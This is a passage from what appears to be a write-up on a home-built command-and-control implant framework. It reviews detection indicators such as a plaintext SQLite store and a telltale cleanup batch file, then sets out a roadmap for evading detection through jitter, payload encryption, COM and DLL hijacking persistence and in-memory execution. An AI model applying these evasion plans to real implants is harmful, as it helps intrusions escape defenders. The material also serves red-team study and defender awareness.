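    return [s.decode() for s in INDICATORS if s in blob]

# Simulated binary: -s -w strips symbols, not string literals
fake_binary = b"\x7fELF..." + b"/api/checkin\x00agent_id\x00C2Agent\x00"
```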

SQLite Database on Disk. The server stores all operational data (agent records, command history, exfiltration metadata) in a plaintext SQLite file (c2.db). If the C2 server is compromised or seized, the entire operational history is available in a single file with no encryption.

Predictable Build Artifacts. The cleanup batch script for Windows self-destruct is written to <agent_path>_cleanup.bat. An incident responder finding a .bat file named agent_windows_amd64.exe_cleanup.bat containing del /f /q loops has a pretty good idea of what happened.


6. Phase 2 Roadmap

Phase 1 proved the architecture works. Phase 2 is about making it viable. Every IOC identified in the review maps to a planned fix, and they fall into three categories.

On the network side, the biggest wins are jitter and encryption. Replacing the static time.Sleep with a randomized interval (base ± jitterPercent) breaks frequency analysis immediately. Beyond that, the plan is to enforce HTTPS with certificate pinning, encrypt payload bodies with AES-256-GCM so even TLS-intercepting proxies can’t read the content, spoof the User-Agent to match the target environment’s normal traffic, and randomize the API endpoint paths at build time so no two deployments share the same URL structure. Together, these address sections 5.1 and 5.4 almost entirely.

On the host side, the goal is to stop leaving artifacts everywhere. That means replacing cmd.exe /C with direct Windows API syscalls for common operations (FindFirstFile for directory listing, GetUserNameW for identity, RegSetValueExW for registry writes) so nothing shows up in the process tree. Persistence moves away from the Run key to less-monitored locations like COM object hijacking, scheduled tasks via the ITaskService COM interface, or DLL search order hijacking. And where possible, payloads get loaded and executed from memory instead of touching disk. This covers the process tree problem from 5.2, the obvious persistence from 5.3, and the binary obfuscation gap from 5.5.

On the server side, it’s basic hardening that should’ve been there from day one. API key authentication on all endpoints, Flask debug mode disabled, the SQLite database encrypted at rest, check-ins rate-limited, and mutual TLS so the server can verify it’s actually talking to a real agent. This closes the open-server problem from 5.5 and the Werkzeug RCE.


Phase 1 is a skeleton. It does what a C2 needs to do: communicate, execute, persist, exfiltrate, and clean up. But it does all of it loudly. The value isn’t in the tool, it’s in understanding, line by line, why it would get caught, and knowing exactly what to change so it doesn’t.

This framework is built for educational purposes only.